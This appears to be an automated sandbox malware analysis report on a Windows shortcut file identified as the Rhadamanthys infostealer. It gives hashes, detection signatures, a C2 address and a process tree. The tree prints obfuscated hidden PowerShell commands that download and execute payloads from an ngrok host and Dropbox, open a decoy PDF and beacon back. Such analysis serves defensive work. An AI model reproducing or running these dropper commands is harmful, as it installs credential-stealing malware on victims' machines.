Edit tour
Windows
Analysis Report
xWpAZpLw47.lnk
Overview
General Information
Sample name: | xWpAZpLw47.lnkrenamed because original name is a hash value |
Original sample name: | 097c3f660c7d255147e359239dafdbd5f24f25a1a9450863160fc049256c1908.lnk |
Analysis ID: | 1578254 |
MD5: | ae5d25dd208b36de2cf9b267cd269d9f |
SHA1: | 5be143764fb671c3818e178298269e79d204c2e2 |
SHA256: | 097c3f660c7d255147e359239dafdbd5f24f25a1a9450863160fc049256c1908 |
Tags: | Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT |
Infos: | |
Detection
RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
- cmd.exe (PID: 1276 cmdline:
"C:\Window s\System32 \cmd.exe" /c pOweRsH eLL -wIndo WStYLe hiD deN -c set -alias aab 784 curl ; sal avfea 3 iEx ; av fea3(aab78 4 -Uri htt ps://23glc rtmzxqgwfp q3oujitt.n grok.pizza /api/secur e/f08a7638 d48ba191b6 51003837c0 a34d -UseB asicParsin g) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1440 cmdline:
pOweRsHeLL -wIndoWSt YLe hiDdeN -c set-al ias aab784 curl ; sa l avfea3 i Ex ; avfea 3(aab784 - Uri https: //23glcrtm zxqgwfpq3o ujitt.ngro k.pizza/ap i/secure/f 08a7638d48 ba191b6510 03837c0a34 d -UseBasi cParsing) MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 5012 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk https://w ww.dropbox .com/scl/f i/zswwoz1n sshfdhbgdi 9dy/Docume nts-about- company-in formation- and-job-de scriptions -4.pdf?rlk ey=xb4z4b9 qljepnpiu5 mkjz888q&d l=1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7336 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=22 52 --field -trial-han dle=2036,i ,154004105 6402098315 1,12558910 1629018785 71,262144 /prefetch: 3 MD5: 69222B8101B0601CC6663F8381E7E00F) - cmd.exe (PID: 8916 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\4751 61710.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8940 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 9048 cmdline:
powershell -wIndoWSt YLe hiDdeN -NoProfil e -Command "$RandomP DF = Join- Path -Path $env:TEMP -ChildPat h ('{0}.pd f' -f ([gu id]::NewGu id())); $R andomEXE = Join-Path -Path $en v:TEMP -Ch ildPath (' {0}.exe' - f ([guid]: :NewGuid() )); Invoke -WebReques t -Uri 'ht tps://www. dropbox.co m/scl/fi/z swwoz1nssh fdhbgdi9dy /Documents -about-com pany-infor mation-and -job-descr iptions-4. pdf?rlkey= xb4z4b9qlj epnpiu5mkj z888q&dl=1 ' -OutFile $RandomPD F; Start-P rocess -Fi lePath 'ms edge.exe' -ArgumentL ist '--kio sk', $Rand omPDF; Inv oke-WebReq uest -Uri 'https://w ww.dropbox .com/scl/f i/uv9rtex9 4bi18x6hfw nvm/runner .exe?rlkey =ohh5enlv6 dylr9jqxqw sffkja&dl= 1' -OutFil e $RandomE XE; Start- Process -F ilePath $R andomEXE; if (Test-P ath $Rando mEXE) { In voke-WebRe quest -Uri 'https:// 23glcrtmzx qgwfpq3ouj itt.ngrok. pizza/meta data/f08a7 638d48ba19 1b65100383 7c0a34d'; }" MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 6612 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user\AppDa ta\Local\T emp\aff731 0e-e430-4b 16-86a8-ee 19b2c5c7f2 .pdf MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7420 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=20 68 --field -trial-han dle=1792,i ,873620980 1987075174 ,515399289 8519663710 ,262144 /p refetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe (PID: 1628 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\678f1a d3-4458-46 d8-ad95-b8 d4b2696f10 .exe" MD5: F7A506F00E525E6D23AEE43D34219625) - 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe (PID: 8992 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\678f1a d3-4458-46 d8-ad95-b8 d4b2696f10 .exe" MD5: F7A506F00E525E6D23AEE43D34219625) - fontdrvhost.exe (PID: 8596 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D) - fontdrvhost.exe (PID: 8572 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F) - WerFault.exe (PID: 8760 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 8 572 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - WerFault.exe (PID: 8432 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 8 992 -s 204 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- svchost.exe (PID: 1560 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 7260 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate ht tps://www. dropbox.co m/scl/fi/z swwoz1nssh fdhbgdi9dy /Documents -about-com pany-infor mation-and -job-descr iptions-4. pdf?rlkey= xb4z4b9qlj epnpiu5mkj z888q&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7596 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 56 --field -trial-han dle=2108,i ,258955873 9445175851 ,911973337 6117647865 ,262144 /p refetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8728 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6388 --fie ld-trial-h andle=2108 ,i,2589558 7394451758 51,9119733 3761176478 65,262144 /prefetch: 8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8780 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6664 --field-t rial-handl e=2108,i,2 5895587394 45175851,9 1197333761 17647865,2 62144 /pre fetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7164 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_collecti ons.mojom. Collection sDataManag er --lang= en-GB --se rvice-sand box-type=c ollections --mojo-pl atform-cha nnel-handl e=7884 --f ield-trial -handle=21 08,i,25895 5873944517 5851,91197 3337611764 7865,26214 4 /prefetc h:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 3176 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=8304 --field-t rial-handl e=2108,i,2 5895587394 45175851,9 1197333761 17647865,2 62144 /pre fetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 4568 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=669 2 --field- trial-hand le=2108,i, 2589558739 445175851, 9119733376 117647865, 262144 /pr efetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. |
{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 5 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |